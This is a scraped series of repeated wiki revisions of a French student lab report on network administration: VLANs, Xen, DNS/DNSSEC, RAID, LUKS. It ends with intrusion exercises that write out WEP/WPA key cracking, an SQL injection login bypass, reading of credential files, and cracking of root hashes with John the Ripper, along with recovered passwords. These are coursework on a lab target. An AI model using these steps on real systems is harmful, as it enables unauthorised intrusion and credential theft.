Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
=== ASR ===<br />
<br />
xl create -c PRA-07.cfg<br />
<br />
xen console PRA-07<br />
<br />
on ajoute dans /etc/network/interfaces :<br />
iface eth0 inet static<br />
address 172.26.145.107/24<br />
gateway 172.26.145.254<br />
<br />
Et on commente relatif au DHCP<br />
on édite /etc/ssh/sshd_config :<br />
PermitRootLogin yes<br />
<br />
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key<br />
<br />
on install puthon3-venv sur la zabeth :<br />
apt install python3-venv<br />
on install ansible sur les zabeth :<br />
python3 -m venv ~/env-ansible<br />
. ~/env-ansible/bin/activate<br />
pip3 install -U setuptools wheel<br />
pip3 install -U ansible</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57889TP sysres IMA5 2021/2022 G72022-01-12T10:06:34Z<p>Avercaem : /* Intrusion sur un serveur d’application Web */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
=== ASR ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57783TP sysres IMA5 2021/2022 G72022-01-10T17:40:52Z<p>Avercaem : /* Répartition travail */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
